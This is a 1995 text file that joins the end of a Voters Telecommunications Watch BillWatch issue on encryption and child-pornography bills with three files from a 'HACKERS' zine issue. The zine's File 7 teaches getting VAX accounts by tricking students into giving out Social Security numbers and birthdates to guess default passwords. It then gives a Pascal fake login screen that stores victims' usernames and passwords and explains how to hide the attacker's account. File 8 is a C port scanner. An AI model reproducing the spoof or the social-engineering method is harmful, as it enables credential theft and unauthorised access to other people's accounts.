Senate sponsors: Dole (R-KS), Coats (R-IN), Grassley (R-IA), McConnell (R-KY),
	Shelby (R-AL), Nickles (R-OK), Hatch (R-UT)

Senate status:
	A hearing was held Monday July 24th.  No action on the bill
	has happened yet as a result of that hearing.

_________________________________________________________________ __________

Anti-Electronic Racketeering Act of 1995 (HR n.a., S 974)

Description:
	S 974 has many effects (not good) on law enforcement's use of
	intercepted communications.  It would also make it unlawful for
	any person to publicly disseminate encoding or encrypting
	software including software *currently allowed* to be exported
	unless it contained a "universal decoding device".  This
	more than likely means that Clipper-style key escrow systems
	could be disseminated, but not strong, private cryptography.

Senate sponsors: Grassley (R-IA)

Senate status: Currently not active and probably won't move before the
	August recess.  

Senate citizen action required: 
	Request bill below and familiarize yourself with it.  VTW is
	tracking this bill, and will alert you when there is movement.
	There is no Congressional action to take right now; as other
	bills (such as the Communications Decency Act) pose a greater,
	more immediate threat.

House of Representatives status: No House version is currently enrolled.

Where to get more info:
	Email:  vtw@vtw.org (with "send s974" in the subject line)
	Gopher: URL:gopher://gopher.panix.com:70/11/vtw/


_________________________________________________________________ __________
Child Pornography Prevention Act of 1995 (HR n.a., S 1237)
Description:
	S 1237 would criminalize material that depicts children engaging
	in sexually-explicit conduct whether or not the material was
	produced with children or entirely without computer.

Senate sponsors:
Hatch (R-UT), Abraham (R-MI), Grassley (R-IA), Thurmond (R-SC)

Senate status: In the Judiciary committee, no hearing has been held yet

Senate citizen action required: 
	Read the bill below and familiarize yourself with it.  VTW is
	tracking this bill, and will alert you when there is movement.

House of Representatives status: No House version is currently enrolled.

Where to get more info:
	Check URL:http://thomas.loc.gov and search for bill S1237.  VTW
	will have a homepage on this bill soon.  We've included both
	the text of the bill and Congressional debate on it below.


	  To amend certain provisions of law relating to child pornography,
	  and for other purposes.
			   IN THE SENATE OF THE UNITED STATES
		    September 13 (legislative day, September 5), 1995
	  Mr. Hatch (for himself, Mr. Abraham, Mr. Grassley, and Mr.
	      Thurmond) introduced the following bill; which was read twice
	      and referred to the Committee on the Judiciary
					 A BILL
	  To amend certain provisions of law relating to child pornography,
	  and for other purposes.
	    Be it enacted by the Senate and House of Representatives of the
	  United States of America in Congress assembled,
	  SECTION 1. SHORT TITLE.
	    This Act may be cited as the `Child Pornography Prevention Act of
	  1995'.
	  SEC. 2. FINDINGS.
	    Congress finds that--
		(1) the use of children in the production of sexually
	      explicit material, including photographs, films, videos,
	      computer images, and other visual depictions, is a form of
	      sexual abuse which can result in physical or psychological
	      harm, or both, to the children involved;
		(2) child pornography permanently records the victim's abuse,
	      and its continued existence causes the child victims of sexual
	      abuse continuing harm by haunting those children in future years;
		(3) child pornography is often used as part of a method of
	      seducing other children into sexual activity; a child who is
	      reluctant to engage in sexual activity with an adult, or to
	      pose for sexually explicit photographs, can sometimes be
	      convinced by viewing depictions of other children `having fun'
	      participating in such activity;
		(4) prohibiting the possession and viewing of child
	      pornography encourages the possessors of such material to
	      destroy them, thereby helping to protect the victims of child
	      pornography and to eliminate the market for the sexually
	      exploitative use of children; and
		(5) the elimination of child pornography and the protection
	      of children from sexual exploitation provide a compelling
	      governmental interest for prohibiting the production,
	      distribution, possession, or viewing of child pornography.
	  SEC. 3. DEFINITIONS.
	    Section 2256 of title 18, United States Code, is amended--
		(1) in paragraph (2)(E), by inserting before the semicolon
	      the following: `, or the buttocks of any minor, or the breast
	      of any female minor';
		(2) in paragraph (5), by inserting before the semicolon the
	      following: `, and data stored on computer disk or by electronic
	      means which is capable of conversion into a visual image';
		(3) in paragraph (6), by striking `and';
		(4) in paragraph (7), by striking the period and inserting `;
	      and'; and
		(5) by adding at the end the following new paragraph:
		`(8) `child pornography' means any visual depiction,
	      including any photograph, film, video, picture, drawing, or
	      computer or computer-generated image or picture, whether made
	      or produced by electronic, mechanical, or other means, of
	      sexually explicit conduct, where--
		    `(A) the production of such visual depiction involves the
		  use of a minor engaging in sexually explicit conduct;
		    `(B) such visual depiction is, or appears to be, of a
		  minor engaging in sexually explicit conduct; or
		    `(C) such visual depiction is advertised, promoted,
		  presented, described, or distributed in such a manner that
		  conveys the impression that the material is or contains a
		  visual depiction of a minor engaging in sexually explicit
		  conduct.'.
	  SEC. 4. PROHIBITED ACTIVITIES RELATING TO MATERIAL CONSTITUTING OR
			    CONTAINING CHILD PORNOGRAPHY.
	    (a) In General: Section 2252 of title 18, United States Code, is
	  amended to read as follows:
	  `Sec. 2252. Certain activities relating to material constituting or
	  containing child pornography
	    `(a) Any person who--
		`(1) knowingly mails, transports, or ships in interstate or
	      foreign commerce by any means, including by computer, any child
	      pornography;
		`(2) knowingly receives or distributes--
		    `(A) any child pornography that has been mailed, shipped,
		  or transported in interstate or foreign commerce by any
		  means, including by computer; or
		    `(B) any material that contains child pornography that
		  has been mailed, shipped, or transported in interstate or
		  foreign commerce by any means, including by computer;
		`(3) knowingly reproduces any child pornography for
	      distribution through the mails, or in interstate or foreign
	      commerce by any means, including by computer;
		`(4) either--
		    `(A) in the maritime and territorial jurisdiction of the
		  United States, or on any land or building owned by, leased
		  to, or otherwise used by or under the control of the United
		  States Government, or in the Indian country (as defined in
		  section 1151), knowingly sells or possesses with the intent
		  to sell any child pornography; or
		    `(B) knowingly sells or possesses with the intent to sell
		  any child pornography that has been mailed, shipped, or
		  transported in interstate or foreign commerce by any means,
		  including by computer, or that was produced using materials
		  that have been mailed, shipped, or transported in
		  interstate or foreign commerce by any means, including by
		  computer; or
		`(5) either--
		    `(A) in the maritime and territorial jurisdiction of the
		  United States, or on any land or building owned by, leased
		  to, or otherwise used by or under the control of the United
		  States Government, or in the Indian country (as defined in
		  section 1151), knowingly possesses 3 or more books,
		  magazines, periodicals, films, videotapes, computer disks,
		  or any other material that contains any child pornography; or
		    `(B) knowingly possesses 3 or more books, magazines,
		  periodicals, films, videotapes, computer disks, or any
		  other material that contains any child pornography that has
		  been mailed, shipped, or transported in interstate or
		  foreign commerce by any means, including by computer,
	      shall be punished as provided in subsection (b).
	    `(b)(1) Whoever violates, or attempts or conspires to violate,
	  paragraphs (1), (2), (3), or (4) of subsection (a) shall be fined
	  under this title or imprisoned not more than 10 years, or both,
	  but, if such person has a prior conviction under this chapter or
	  chapter 109A, such person shall be fined under this title and
	  imprisoned for not less than 5 years nor more than 15 years.
	    `(2) Whoever violates paragraph (5) of subsection (a) shall be
	  fined under this title or imprisoned for not more than 5 years, or
	  both.'.
	    (b) Technical Amendment: The table of sections for chapter 110 of
	  title 18, United States Code, is amended by amending the item
	  relating to section 2252 to read as follows:
	  `2252. Certain activities relating to material constituting or
	      containing child pornography.'.
	  SEC. 5. PRIVACY PROTECTION ACT AMENDMENTS.
	    Section 101 of the Privacy Protection Act of 1980 (42 U.S.C.
	  2000aa) is amended--
		(1) in subsection (a)(1), by inserting before the semicolon
	      at the end the following: `, or if the offense involves the
	      production, possession, receipt, mailing, sale, distribution,
	      shipment, or transportation of child pornography, the sexual
	      exploitation of children, or the sale or purchase of children
	      under section 2251, 2251A, or 2252 of title 18, United States
	      Code'; and
		(2) in subsection (b)(1), by inserting before the semicolon
	      at the end the following: `, or if the offense involves the
	      production, possession, receipt, mailing, sale, distribution,
	      shipment, or transportation of child pornography, the sexual
	      exploitation of children, or the sale or purchase of children
	      under section 2251, 2251A, or 2252 of title 18, United States
	      Code'.
	  SEC. 6. SEVERABILITY.
	    If any provision of this Act, an amendment made by this Act, or
	  the application of such provision or amendment to any person or
	  circumstance is held to be unconstitutional, the remainder of this
	  Act, the amendments made by this Act, and the application of such
	  to any other person or circumstance shall not be affected thereby.


   STATEMENTS OF INTRODUCED BILLS AND JOINT RESOLUTIONS (Senate -
   September 13, 1995) 
   
   
   
  THE CHILD PORNOGRAPHY PREVENTION ACT OF 1995
  
   
   
   Mr. HATCH. Mr. President, it is impossible for any decent American not
   to be outraged by child pornography and the sexual exploitation of
   children. Such material is a plague upon our people and the moral
   fabric of this great Nation.
   
   And, as a great Nation, I believe that we have both the constitutional
   right and moral obligation to protect our children from those who,
   motivated by profit or perversion or both, would abuse, exploit, and
   degrade the weakest and most vulnerable members of our society.
   
   Current Federal law dealing with child pornography reflects the
   overwhelming bipartisan consensus which has always existed, both in
   Congress and in the country, that there is no place for such filth
   even in a free society and that those who produce or peddle this
   reprehensible material must be made to feel the full weight of the law
   and suffer a punishment reflective of the seriousness of their
   offense.
   
   As with many of our criminal statutes, however, effective enforcement
   of our laws against child pornography today faces a new obstacle: The
   criminal use, or misuse, of new technology which is outside the scope
   of existing statutes. In order to close this computer-generated
   loophole and to give our law enforcement authorities the tools they
   need to stem the increasing flow of high-tech child pornography, I am
   today introducing the Child Pornography Prevention Act of 1995.
   
   The necessity for prompt legislative action amending our existing
   Federal child pornography statutes to cover the use of computer
   technology in the production of such material was vividly illustrated
   by a recent story in the Washington Times. This story, dated July 23,
   1995, reported the conviction in Canada of a child pornographer who
   copied innocuous pictures of children from books and catalogs onto a
   computer, altered the images to remove the childrens' clothing, and
   then arranged the children into sexual positions. According to
   Canadian police, these sexual scenes involved not only adults and
   children, but also animals.
   
   Even more shocking than the occurrence of this type of repulsive
   conduct is the fact that, under current Federal law, those pictures,
   depicting naked children involved in sex with other children, adults,
   and even animals, would not be prosecutable as child pornography. That
   is because current Federal child pornography and sexual exploitation
   of children laws, United States Code title 18, sections 2251, 2251A,
   and 2252, cover only visual depictions of children engaging in
   sexually explicit conduct whose production involved the use of a minor
   engaging in such conduct; materials such as photographs, films, and
   videotapes.
   
   Today, however, visual depictions of children engaging in any
   imaginable forms of sexual conduct can be produced entirely by
   computer, without using children, thereby placing such depictions
   outside the scope of Federal law. Computers can also be used to alter
   sexually explicit photographs, films, and videos in such a way as to
   make it virtually impossible for prosecutors to identify individuals,
   or to prove that the offending material was produced using children.
   
   The problem is simple: While Federal law has failed to keep pace with
   technology, the purveyors of child pornography have been right on line
   with it. This bill will help to correct that problem.
   
   The Child Pornography Prevention Act of 1995, which includes a
   statement of congressional findings as to harm, both to children and
   adults, resulting from child pornography, has three major provisions.
   First, it would amend United States Code title 18, section 2256, to
   establish, for the first time, a specific, comprehensive, Federal
   statutory definition of child pornography. Under this bill, any visual
   depiction, such as a photograph, film, videotape or computer image,
   which is produced by any means, including electronically by computer,
   of sexually explicit conduct will be classified as child pornography
   if: (a) its production involved the use of a minor engaging in
   sexually explicit conduct; or (b) it depicts, or appears to depict, a
   minor engaging in sexually explicit conduct; or (c) it is promoted or
   advertised as depicting a minor engaging in sexually explicit conduct.

_________________________________________________________________ __________

SUBSCRIPTION AND REPRODUCTION INFORMATION

      *** Know of someone ANYWHERE with a fax machine but without net ***
      *** access that's interested in VTW's issues?  Tell them to     ***
      *** call and get on our weekly fax distribution list at         ***
      *** (718) 596-2851 (or email us their fax number).              ***

	 To get on the distribution list for BillWatch, send mail to
      listproc@vtw.org with "subscribe vtw-announce Firstname Lastname"
			     in the subject line.

	To unsubscribe from BillWatch (and all other VTW publications)
	send mail to listproc@vtw.org with "unsubscribe vtw-announce"
			     in the subject line.

	 Email vtw@vtw.org with "send billwatch" in the SUBJECT LINE
		  to receive the latest version of BillWatch

	For permission to reproduce VTW alerts contact vtw@vtw.org


_________________________________________________________________ __________
    End VTW BillWatch Issue #18, Date: Sun Sep 17 16:36:37 EDT 1995
_________________________________________________________________ __________
This file provided by:

		Voters Telecommunications Watch
	*** Watching out for your civil liberties ***

Email:          vtw@vtw.org (preferred)
Gopher:         gopher -p1/vtw gopher.panix.com
URL:            http://www.vtw.org/
Telephone:      (718) 596-2851 (last resort)
================================================================= ==========



			      -= H A C K E R S =-

			    Issue #3,  File #7 of 9

			       A VMS Login Spoof

				By:  Talonphish


----------------------------------------------------------------- ------------
	When I read last months issue of HACKERS, I was excited to see 
the article about VAX hacking.  One thing I noticed was that to use most, 
if not all of the things spoken about in the article, you had to already 
have a privileged account.  This left open one question, Just how does 
one go about getting a privileged account on a VAX system?  That is where 
this article picks up.
	It has been said that to completly secure a system you would need 
to shut it down and lock it up.  In other words, not let anyone use it or 
even get near it.  It has also been said that the weakest link in a 
secure system is the system users.  This even holds true for VAX, which 
is almost considered a swear word by many because it is supposedly 
"unhackable".  Not the case.
	
	GETTING AN ACCOUNT.
    -------------------------
	The first thing a person needs to do in order to do anything with 
a VAX is obviously to get an account.  It doesn't have to be a privileged 
account, any account will do.  
	The best way to do this would be to perform a little Social 
Engineering.  Shoulder surfing should do the trick.  If that is 
impossible, then just do something similar to what I did.
	At a certain college running VAX, all freshman students passwords 
were their birthdate in the form 041975, until they changed them. All 
usernames for students were their first initial, last 6 digits of their 
social security number, and their last initial.  Most freshman students 
are somewhat computer illiterate, and never change their passwords.  
Therefore, all you needed to do to get an account, was to look at their 
drivers licence, or conduct a little survey (not in the computer lab) 
asking students questions about major etc.. and just dropping in a 
question of their soc. number and birthday.. The moral? Often a person
doesnt need to look to holes, or other stupid bugs posted on the net 
that anyone can abuse, but to yourself and your own imagination to gain
needed information.

	ONCE YOU HAVE AN ACCOUNT.
      ----------------------------

	Once you have an account, be it yours or someone elses, you want 
to gain priviliges or at least an account that isn't yours to use.  
Assuming that your account is just a basic user account with no special 
priv's, you need to devise a plan to get a different account.  Now you 
need to do a little research.  Where do people with priviliged accounts 
log in from?  ie.. Professors.  Once you know this, you can steal their 
accounts fairly easily with a little program.  All you need to know is 
what the login screens look like.  Here is a VERY simple pascal program 
that will write the username and password to a file called outfile.  
	!!!WARNING!!!  This is not an amazing program, if you are 
going to use it, don't use it from your account!  You should also add 
lines to the file login.com that will log out the account should anyone 
break out of the program and type things such as directory, show users, 
or anything else normally typed.  You don't want people to know which 
account you are on.  I also changed the prompt so it said "ERROR, TURN 
OFF TERMINAL AND REEBOOT"  You can do this by typing Set prompt:== "whatever"
from the $ prompt.

begin program
----------------------------------------------------------------- -----------
program snag(input,output,outfile);
type
	str20= varying[20] of char;
var
	outfile:file;
	I:integer;
	cvax,username,password:str20;
begin
	rewrite outfile;
	write('Local> ');
	readln(cvax);  {this simulates the login screen}
	writeln('Local -010- session 1 to VAX on node OMEGA established');
	writeln('Somewhere University of XX');
	writeln('Computing and Communications Center');
	writeln('Unauthorized Access Prohibited');  {ain't it the truth}
	write('Username: ');
	readln(username);
	write('Password: ');
	readln(password);
	write(outfile,username);
	write(outfile,password);
	writeln('ERROR x99503b, Please turn off terminal and reeboot');
	close outfile;
	for I=1 to 100 do 
		readln;      {prevents person from hitting keys and going 
				back to shell}
	end.
	 --------------------------------------------------------------
end program..
	
	Run in the right place at the right time and viola, priviliged
access.  Then use the things you learned in issue #2 of HACKERS and
hack away.  
	*note*  This program did not turn off echo from keyboard to 
screen for the input of password, this could be a dead giveaway.  I
suggest rewriting the code(in a better language).  This is only an 
example.
	In closing, 
		No system will ever be secure and useful at the same 
time.  


	Talonphish
		





			       -= H A C K E R S =-

			     Issue #3,  File #8 of 9

			       Remote Host Probing

				  By:  IOERROR

The enclosed program, 100% my own code, will probe port 1-1024 on the given
host (call it as:  % tcpprobe connected.com) and report on which hosts accept
connections.  It may require a little tweaking to work on some of the oddball
Unixes like SunOS... I wrote it under Linux.
-----BEGIN-----cut here-----
/* -*-C-*- tcpprobe.c */
/* tcpprobe - report on which tcp ports accept connections */
/* IO ERROR, error@axs.net, Sep 15, 1995 */

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>

int main(int argc, char **argv)
{
  int probeport = 0;
  struct hostent *host;
  int err, i, net;
  struct sockaddr_in sa;

  if (argc != 2) {
    printf("Usage: %s hostname\n", argv[0]);
    exit(1);
  }

  for (i = 1; i < 1024; i++) {
    strncpy((char *)&sa, "", sizeof sa);
    sa.sin_family = AF_INET;
    if (isdigit(*argv[1]))
      sa.sin_addr.s_addr = inet_addr(argv[1]);
    else if ((host = gethostbyname(argv[1])) != 0)
      strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr);
    else {
      herror(argv[1]);
      exit(2);
    }
    sa.sin_port = htons(i);
    net = socket(AF_INET, SOCK_STREAM, 0);
    if (net < 0) {
      perror("\nsocket");
      exit(2);
    }
    err = connect(net, (struct sockaddr *) &sa, sizeof sa);
    if (err < 0) {
      printf("%s %-5d %s\r", argv[1], i, strerror(errno));
      fflush(stdout);
    } else {
      printf("%s %-5d accepted.                               \n", argv[1], i);
      if (shutdown(net, 2) < 0) {
	perror("\nshutdown");
	exit(2);
      }
    }
    close(net);
  }
  printf("                                                                \r");
  fflush(stdout);
  return (0);
}
 


				-= H A C K E R S =-

			      Issue #3,  File #9 of 9

				      The End


	As I said in the intro, I've moved, so from now on direct all snail
mail to Room #621A, Redwood Hall, 186 Bleeker St., Newark, NJ  07103.  My
new phone number is (201) 565-9145, and if you live in NYC, I'll see you at
2600, hopefully.  As always, if you've got an article or two, send them over
to scanlonr@delphi.com.  We still have not had enough reader response, good
or bad, to justify a letters column, so if you have anything to say about the
mag, or have any questions about Hacking as a whole, send them on in.  So 
until next month, where ever you hack, may the ethic be with you....